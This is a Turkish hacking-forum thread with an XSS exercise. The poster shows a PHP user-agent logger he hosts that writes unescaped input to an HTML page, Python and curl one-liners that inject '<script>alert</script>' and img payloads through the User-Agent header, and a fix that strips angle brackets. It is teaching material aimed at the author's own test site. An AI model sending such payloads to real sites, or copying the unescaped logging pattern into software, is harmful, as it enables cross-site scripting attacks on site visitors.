THT DUYURU
Siber Güvenlik Siber Güvenlik ile alakalı araçların kullanımı, bilgi paylaşımı ve siber güvenlik eğitimi ile ilgili kaynakların paylaşıldığı alanımızdır.

siber güvenlik eğitimi
Seçenekler

Ufak Bir XSS Alıştırması

Xenopeltis - ait Kullanıcı Resmi (Avatar)
Stajyer Yazılımcı
Üyelik tarihi:
04/2020
Nereden:
a
Yaş:
100
Mesajlar:
2.027
Konular:
358
Teşekkür (Etti):
726
Teşekkür (Aldı):
1045
Ticaret:
(0) %
10
2304
bir Hafta önce
#1
Merhabalar bugün internette bulduğum bir PHP ip logger kodunda bulduğum bir XSS açığıı sizlerle paylaşacağım. Açığı sömürdükten sonra bu açığı kapatacağım. Ben kodları editleyip IP Logger kısmını kaldırdım şu an sadece gelen ziyaretçilerin user-agent'lerini şu adreste logluyor :


https://ippp.herokuapp.com/test3201.html


Normalde şu adreste bir php kodu çalışıyor ama gelen geçen user-agent olarak bir şey yazdırmasın diye o PHP kodunu kaldıracağım :


https://ippp.herokuapp.com


Çalışan PHP kodu :

Kod:
  <?php   $browser = $_SERVER['HTTP_USER_AGENT'];
  $dateTime = date('Y/m/d G:i:s');
  $file = "test3201.html";
  $file = fopen($file, "a");
  $data = "<pre> <b>Browser</b>: $browser <br>on Time : $dateTime <br></pre>";
  fwrite($file, $data);
  fclose($file);
  echo "<h1>Hi n0.0b :)</h1>";
  ?>
Yazının devamını okumadan nasıl bir yöntem kullanacağımı bulmaya çalışın. Aklınıza bir fikir gelmiyorsa devam edebilirsiniz.



Öncelikle siteye baktığımızda kullanıcı girişi isteyen hiçbir şey yok. Bu kısımda ezberciler doğal olarak eleniyor. Belki bizden bir kutucuk içinde girdi istemiyor ama siteye girerken bir header parametresi olan User-Agent yolluyoruz. O zaman biz bu siteye User-Agent olarak bir script yollarsak çalışacaktır diye düşünüyoruz. Hemen bir Python kodu yazalım :





Kod:
 
Kod:
 
 
  import requests
 
  uri ='https://ippp.herokuapp.com'
 
  headers = {
  'User-Agent':"<script>alert('Xeno')</script>"}
 
  r = requests.get(uri,headers=headers)
 
 
 
 

Kodu çalıştırıyorum ve logların tutulduğu sayfamız artık alert veriyor.





İsterseniz bir de resim ekleyelim:






Kod:
 
Kod:
  import requests
 
  uri ='https://ippp.herokuapp.com'
 
  headers = {
  'User-Agent':"<img/src='https://www.turkhackteam.org/images/turkhackteamtm/img/logo.png'></img>"}
 
  r = requests.get(uri,headers=headers)
 
 
 
 




Şimdi ise nasıl bu açığı kapatacağımızı düşünelim. Ben açığı kapatmak için <> taglarını replace etmeyi düşündüm. Böylece yollanan hiçbir kod çalışmayacak çünkü taglar yok.



Kodu şu şekilde değişelim :


Kod:
  <?php
 
  $browser = $_SERVER['HTTP_USER_AGENT'];
  $browser = str_replace('<','',$browser);
  $browser = str_replace('>','',$browser);
  $dateTime = date('Y/m/d G:i:s');
  $file = "test3201.html";
  $file = fopen($file, "a");
  $data = "<pre><b> Browser</b>: $browser <br>on Time : $dateTime <br></pre>";
  fwrite($file, $data);
  fclose($file);
  echo "<h1>Hi n0.0b :)</h1>";
  ?>
 



Şimdi Python kodlarımızı tekrar çalıştıralım:





Gördüğünüz gibi taglar replace edildiği için açığımız da kapandı.



İncelemeniz açısından html dosyasını silmiyorum ama php sayfasını sıfırladım. Siteye gidip canlı canlı bakabilirsiniz.


---------------------
Konu Xenopeltis tarafından (bir Hafta önce Saat 18:21 ) değiştirilmiştir.
Benozan5400 - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
08/2018
Nereden:
Sakarya
Mesajlar:
28
Konular:
5
Teşekkür (Etti):
85
Teşekkür (Aldı):
3
Ticaret:
(0) %
bir Hafta önce
#2
yazdığınız kodları kopyala yapıştır yapıyorum burp suite reapitire birşey olduğu yok yada tam olarak nasıl yapılıyor
bu kodları nereye yazmamız gerekiyor acaba ?
Konu 'Suskun tarafından (bir Hafta önce Saat 20:53 ) değiştirilmiştir.
Barad Dur - ait Kullanıcı Resmi (Avatar)
Çaylak Basın&Medya
Üyelik tarihi:
08/2016
Nereden:
Mordor
Yaş:
22
Mesajlar:
507
Konular:
44
Teşekkür (Etti):
83
Teşekkür (Aldı):
130
Ticaret:
(0) %
bir Hafta önce
#3
Elinize emeğinize sağlık
---------------------
DevianArt

Twitter
Xenopeltis - ait Kullanıcı Resmi (Avatar)
Stajyer Yazılımcı
Üyelik tarihi:
04/2020
Nereden:
a
Yaş:
100
Mesajlar:
2.027
Konular:
358
Teşekkür (Etti):
726
Teşekkür (Aldı):
1045
Ticaret:
(0) %
bir Hafta önce
#4
Alıntı:
Benozan5400´isimli üyeden Alıntı Mesajı göster
yazdığınız kodları kopyala yapıştır yapıyorum burp suite reapitire birşey olduğu yok yada tam olarak nasıl yapılıyor
bu kodları nereye yazmamız gerekiyor acaba ?
Python kodları bunlar. Python ile çalıştırabilirsin.

https://python-istihza.yazbel.com/ka...alistirma.html

Diğerleri de PHP kodları. XAMPP ile local'de çalıştırabilirsin.
---------------------
Konu Xenopeltis tarafından (bir Hafta önce Saat 18:20 ) değiştirilmiştir.
"Bl4P! - ait Kullanıcı Resmi (Avatar)
Grafiker
Üyelik tarihi:
05/2019
Nereden:
Intelligence
Yaş:
1
Mesajlar:
1.116
Konular:
146
Teşekkür (Etti):
319
Teşekkür (Aldı):
300
Ticaret:
(0) %
bir Hafta önce
#5
eline sağlıksssssss
---------------------
"Bl4P! is a " Volkswagen Group" Company

https://www.turkhackteam.org/cyber-s...timi-ligi.html
Benozan5400 - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
08/2018
Nereden:
Sakarya
Mesajlar:
28
Konular:
5
Teşekkür (Etti):
85
Teşekkür (Aldı):
3
Ticaret:
(0) %
bir Hafta önce
#6
xamppı kurdum python idleye yazdım kodları run dedim fakat hata veriyo bana
Traceback (most recent call last):
File "C:/Users/USER/Desktop/xss.py", line 1, in <module>
import requests
ModuleNotFoundError: No module named 'requests'
bu şekilde bir hata veriyor boşllukları sildim önce run dedim daha dğoğrusu bana hatalarımı gösterdi sildim run dedim o hatayı aldım
yazdığım kod da import requests

uri ='https://ippp.herokuapp.com'

headers = {
'User-Agent':"<script>alert('ozan')</script>"}

r = requests.get(uri,headers=headers)

budur sadece adımı yazdım merak ettiğimden acaba başarabildim mi diye de olmadı
Xenopeltis - ait Kullanıcı Resmi (Avatar)
Stajyer Yazılımcı
Üyelik tarihi:
04/2020
Nereden:
a
Yaş:
100
Mesajlar:
2.027
Konular:
358
Teşekkür (Etti):
726
Teşekkür (Aldı):
1045
Ticaret:
(0) %
bir Hafta önce
#7
Alıntı:
Benozan5400´isimli üyeden Alıntı Mesajı göster
xamppı kurdum python idleye yazdım kodları run dedim fakat hata veriyo bana
Traceback (most recent call last):
File "C:/Users/USER/Desktop/xss.py", line 1, in <module>
import requests
ModuleNotFoundError: No module named 'requests'
bu şekilde bir hata veriyor boşllukları sildim önce run dedim daha dğoğrusu bana hatalarımı gösterdi sildim run dedim o hatayı aldım
yazdığım kod da import requests

uri ='https://ippp.herokuapp.com'

headers = {
'User-Agent':"<script>alert('ozan')</script>"}

r = requests.get(uri,headers=headers)

budur sadece adımı yazdım merak ettiğimden acaba başarabildim mi diye de olmadı
Üçüncü parti bir modül kullandım. Adı 'requests'. Bunu yüklemen için bilgisayarında pip kurulu olmalı. İnternetten pip kurulumuna bak. Kurduktan sonra pip install requests diyerek modülü kur. Tekrar çalıştırdığında olacaktır.
---------------------
Konu Xenopeltis tarafından (bir Hafta önce Saat 16:14 ) değiştirilmiştir.
Benozan5400 - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
08/2018
Nereden:
Sakarya
Mesajlar:
28
Konular:
5
Teşekkür (Etti):
85
Teşekkür (Aldı):
3
Ticaret:
(0) %
bir Hafta önce
#8
hemen yapmaya çalışacam
yardım için gerçekten çok sağol
Xenopeltis Teşekkür etti.
BH80 - ait Kullanıcı Resmi (Avatar)
İstihbarat Tim Lideri
Üyelik tarihi:
01/2016
Nereden:
-Türkistan-
Mesajlar:
560
Konular:
88
Teşekkür (Etti):
468
Teşekkür (Aldı):
869
Ticaret:
(0) %
bir Hafta önce
#9
Tebrikler güzel konu olmuş, daha kapsamlı konular bekliyorum
--------------------- İletişim için
Twitter: BH80_THT
E-posta: [email protected] & [email protected]
Telegram: thtbh

SELAM SANA
EY YILLARI HEBA OLAN GENÇ!
Xenopeltis Teşekkür etti.
maj344 - ait Kullanıcı Resmi (Avatar)
Katılımcı Üye
Üyelik tarihi:
02/2019
Mesajlar:
277
Konular:
28
Teşekkür (Etti):
999
Teşekkür (Aldı):
88
Ticaret:
(0) %
bir Hafta önce
#10
cURL ile de yapılabilir.


Kod:
curl -A "<script>alert(1)</script>" https://ippp.herokuapp.com/t3201.html
---------------------
Kod:
(signature
 (type 'formatted-text)
 (text "Sahici bir sarsıntı, sahte bir dengeden iyidir."))

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler